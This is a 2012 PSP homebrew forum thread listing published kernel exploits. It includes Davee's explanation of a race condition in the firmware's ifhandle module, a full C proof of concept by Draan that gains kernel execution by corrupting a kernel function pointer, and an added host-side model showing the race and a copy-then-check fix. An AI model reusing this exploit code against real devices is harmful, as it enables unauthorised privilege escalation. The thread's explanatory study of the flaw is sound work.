
How many kexploits have been published? 4 or more?

Post crashes / information about (potential) security issues over here! Sensitive information might be deleted without notice.

Re: How many kexploits have been published? 4 or more?

Postby jigsaw » Wed May 30, 2012 11:15 am

Yoti wrote:
Davee wrote:I've been working on compiling a list of the previous exploits as a learning resource so if you need to know any details on an exploit, feel free to ask.

May you post a sample (hello k-world) for 5.03/psheet?


Freddy has explained here:

viewtopic.php?p=2022#p2022
jigsaw
 
Posts: 255
Joined: Sat Dec 18, 2010 12:49 pm

Re: How many kexploits have been published? 4 or more?

Postby Dovahkiin » Wed May 30, 2012 11:24 am

@Davee does the psheet kxploit exist on 5.00? Also, are the ifhandle from 5.70 and the ifhandle from 6.60 related/one or different?
PSP-1003 Ceramic White(TA-086)(5.00 M33-6)
PSP-2003 Piano Black(TA-085 can make pandora batteries...)(5.00 M33-6)
PSP-3003 Piano Black(TA-092)(5.00 OFW having fun with psheet kxploit)
Dovahkiin
 
Posts: 35
Joined: Mon Apr 30, 2012 4:39 am

Re: How many kexploits have been published? 4 or more?

Postby FrEdDy » Wed May 30, 2012 12:04 pm

Dovahkiin wrote:@Davee does the psheet kxploit exist on 5.00? Also, are the ifhandle from 5.70 and the ifhandle from 6.60 related/one or different?

I hope you don't mind if I answer instead of Davee.
Yes, the psheet exploit exists on 5.00, and the 5.70 ifhandle exploit was different from the 6.60 one, AFAIK (I may have a different exploit, ifhandle was pretty buggy back then :roll: )
https://github.com/freddy-156
<@n00b81> FREDDY CUTTIES
FrEdDy
HBL Collaborator
 
Posts: 349
Joined: Mon Sep 27, 2010 7:08 pm

Re: How many kexploits have been published? 4 or more?

Postby Davee » Wed May 30, 2012 12:32 pm

The 5.70 ifhandle actually exists from 5.00 times. I posted it on IRC when I found out it was patched on 6.20. It's a race condition exploit where the input linked list is searched for kernel addresses. What you do is:

[ Data #1 ]
[ Data #2 ]

Have two data structures and link #1 to #2 and then #2 back onto itself so you have a circular loop. Create a second thread and let it sleep for a second or two and let the creator call a chosen ifhandle function with this structure. Now, when the created thread resumes, Data #1 will have been checked for kernel addresses and now it's constantly checking #2. This is the easy part now, link #1 to NULL, add kernel addresses into #1 and then when you want the other thread to resume proper execution, just link #2 to NULL.

After that, the syscall thread will resume thinking it has checked for addresses but in reality, the list has kernel addresses and you can do what you want.
The bug is a design flaw in the module. Really nice exploit, probably my favourite next to the other ifhandle one.

I'd show the code, but I don't have it handy; if anybody else does, feel free to show it.
Follow me on twitter: @DaveeFTW
Davee
Guru
 
Posts: 294
Joined: Mon Jan 10, 2011 1:24 am
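The race Davee describes above, as an added example that is not part of this thread or of any PSP code: a host-side C model of the check-then-use walk over a user-supplied linked list, next to the copy-then-check form that closes the window. Everything here is constructed for the model: the "kernel" checker, the yield hook that stands in for the point where the syscall thread gets preempted, the 32-bit PSP-style addresses (the kernel segment is assumed to start at 0x80000000) and the node cap that also stops a circular list from hanging the walk.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed model of the race: addresses are PSP-style 32-bit values, not host pointers,
 * so the "kernel address" test is a range check (kernel segment assumed at 0x80000000+). */
#define KERNEL_BASE 0x80000000u
#define MAX_NODES   16                 /* node cap for the hardened snapshot walk */

typedef struct Node {
    struct Node *next;
    uint32_t     data;                 /* address the kernel would later write through */
} Node;

typedef struct {
    Node *n1, *n2;                     /* the two user-owned nodes */
    int   fire_after, yields, fired;   /* rewire the list on the fire_after-th yield */
} attacker_ctx;

static int g_last_fired;               /* did the attacker get its window in the last run */

/* Called after each node is checked: the point where the syscall thread is preempted. */
typedef void (*yield_fn)(void *ctx);

static int is_kernel_addr(uint32_t a) { return a >= KERNEL_BASE; }

/* Vulnerable pattern: check the user-supplied list in place; nothing stops it changing
 * between this check and the later use. Returns 1 if every node seen was clean. */
static int validate_in_place(Node *head, yield_fn yield, void *ctx)
{
    for (Node *n = head; n != NULL; n = n->next) {
        if (is_kernel_addr(n->data)) return 0;
        yield(ctx);
    }
    return 1;
}

/* "Use" step: the first kernel-range address the kernel would write through, or 0. */
static uint32_t consume(const Node *head)
{
    for (const Node *n = head; n != NULL; n = n->next)
        if (is_kernel_addr(n->data)) return n->data;
    return 0;
}

/* The second thread's work: once the checker is spinning on node 2, unlink node 1, load a
 * kernel address into it, then cut node 2 loose so the walk ends with a "clean" verdict. */
static void attacker_yield(void *p)
{
    attacker_ctx *a = p;
    if (a->fired || ++a->yields < a->fire_after) return;
    a->n1->next = NULL;
    a->n1->data = KERNEL_BASE + 0x13B14;   /* constructed kernel-range target */
    a->n2->next = NULL;                    /* stop the loop */
    a->fired = g_last_fired = 1;
}

/* n1 -> n2 -> n2 (circular) or n1 -> n2 -> NULL, both carrying harmless user data. */
static void build_list(Node *n1, Node *n2, int circular)
{
    n1->next = n2;                   n1->data = 1;
    n2->next = circular ? n2 : NULL; n2->data = 1;
    g_last_fired = 0;
}

/* Racy syscall end to end: returns the kernel address the use step would touch, or 0 if
 * the check actually held. Yield 1 is on n1; yields 2 and 3 are the spin on n2. */
uint32_t run_vulnerable(void)
{
    Node n1, n2;
    attacker_ctx a = { &n1, &n2, 3, 0, 0 };
    build_list(&n1, &n2, 1);
    return validate_in_place(&n1, attacker_yield, &a) ? consume(&n1) : 0;
}

/* Hardened pattern: copy the list into private storage under a node cap (so a cycle
 * cannot hang the walk), then check and use only the copy. Returns 0 on success. */
static int snapshot(const Node *head, Node *out, size_t cap)
{
    size_t i = 0;
    for (const Node *n = head; n != NULL; n = n->next) {
        if (i == cap) return -1;       /* cycle or oversized list: reject */
        out[i++] = *n;
    }
    for (size_t j = 0; j < i; j++)
        out[j].next = (j + 1 < i) ? &out[j + 1] : NULL;
    return 0;
}

/* -1 if the list was rejected, else the kernel address the use step would touch (0 if
 * none). The attacker still fires at its first chance, but only touches the originals. */
long long run_hardened(int circular)
{
    Node n1, n2, copy[MAX_NODES];
    attacker_ctx a = { &n1, &n2, 1, 0, 0 };
    build_list(&n1, &n2, circular);
    if (snapshot(&n1, copy, MAX_NODES) != 0) return -1;
    return validate_in_place(copy, attacker_yield, &a) ? consume(copy) : -1;
}

int attacker_fired_last_run(void) { return g_last_fired; }
```

`run_vulnerable()` walks the list with the in-place check, lets the attacker hook rewire it while the walk is stuck on the self-linked second node, and comes back with a "clean" verdict on a list whose head now carries 0x80013B14. `run_hardened(1)` rejects the same circular list as soon as the snapshot hits the node cap, before any check runs; `run_hardened(0)` validates a private copy of a plain two-node list, and although the hook still fires, it only poisons the user's own nodes, so the use step finds nothing in the kernel range.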

Re: How many kexploits have been published? 4 or more?

Postby jigsaw » Wed May 30, 2012 12:59 pm

@Davee

570 is really beautiful. If by "the other ifhandler one" you mean the one published in 660, IMO 570 is way better.
jigsaw
 
Posts: 255
Joined: Sat Dec 18, 2010 12:49 pm

Re: How many kexploits have been published? 4 or more?

Postby Draan » Wed May 30, 2012 1:24 pm

Davee wrote:I'd show the code, but I dont have it handy, if anybody else does, feel free to show it.

Here ya go, something I and n00b81 cooked together back then:
Code:
//5.50 ifhandle PoC
#include <pspkernel.h>
#include <psputils.h>
#include <pspnet.h>
#include <string.h>

// sceNet export the PoC calls to kick off the ifhandle list walk; add this prototype if your SDK headers lack it
int sceNetMFree(void *ptr);

// Node layout expected by the ifhandle code that walks the list and checks it for kernel addresses
typedef struct IfhandleParam {
    struct IfhandleParam *next;
    u32 unk1;
    void *data;
    u32 data_size;
    u16 unk2;
    u16 check;
    char unusedstuff[48];
    void *data2;
    void *addr3;
} IfhandleParam;

int ksploitmain2(void);

// Entry point the hijacked kernel code path ends up calling
int _ksploitmain(int arg1, int arg2)
{
    return ksploitmain2();
}

// Nop slide placed right after _ksploitmain: the kernel code does a second "sw" near the
// function address it stores, and this padding makes sure that write lands somewhere harmless
void dummy(void)
{
    __asm__ __volatile__(".rept 60\n\tnop\n\t.endr");
}

int ksploitmain2(void)
{
    //your kernel stuff here
    return 0;
}

// Second thread: sleeps while the syscall thread spins on param[1], then rewires the list so the
// already-checked param[0] carries the kernel addresses and the walk terminates
int lolthread(SceSize argsize, u32 *argp)
{
    IfhandleParam *param_one = (IfhandleParam *)argp[0];
    IfhandleParam *param_two = (IfhandleParam *)argp[1];

    sceKernelDelayThread(2 * 1000 * 1000);

    param_one->next = NULL;
    param_one->check = 5; //a random value which passes an additional check in Sony's code. Nothing important, really
    param_two->next = NULL; // stop the loop!

    sceKernelDelayThread(1 * 1000 * 1000);

    return 0;
}

//main user function
void _start(void)
{
    dummy(); //call dummy so GCC won't trash it
    sceKernelDcacheWritebackInvalidateAll();
    SceUID pthid = sceKernelCreateThread("lol", (SceKernelThreadEntry)lolthread, 0xC, 0x1000, 0, NULL);
    u32 args[2];

    IfhandleParam param[2];
    memset(param, 0, sizeof(param));

    //param[0] -> param[1] -> param[1]: the circular loop the syscall thread gets stuck in
    param[0].next = &param[1];
    param[1].next = &param[1];

    param[0].data = (void *)1;
    param[0].data_size = 1;

    param[1].data = (void *)1;
    param[1].data_size = 1;

    //IIRC it's a pointer addr, called by sceKernelLibcGettimeofday
    //The Sony code was adding 0x48 to the addr before writing via "sw", so we subtract it here to get a valid addr
    //The Sony code does another "sw" around the ksploitmain addr. I've added that dummy function to make sure this operation
    //won't destroy something important for us
    param[0].data2 = (void *)(0x88013B14 - 0x48);
    param[0].addr3 = (void *)&_ksploitmain;

    args[0] = (u32)&param[0];
    args[1] = (u32)&param[1];

    sceKernelStartThread(pthid, sizeof(args), args);

    //the chosen ifhandle function: walks the crafted list while lolthread sleeps, then resumes after the rewire
    sceNetMFree(&param[0]);

    sceKernelLibcGettimeofday((void *)0x08800001, (void *)0x08800002); //random args -> jump into our code with kernel rights!
    sceKernelDelayThread(2 * 1000 * 1000);

    //back to VSH
    sceKernelExitGame();
}
Draan
 
Posts: 71
Joined: Tue Dec 21, 2010 9:49 pm
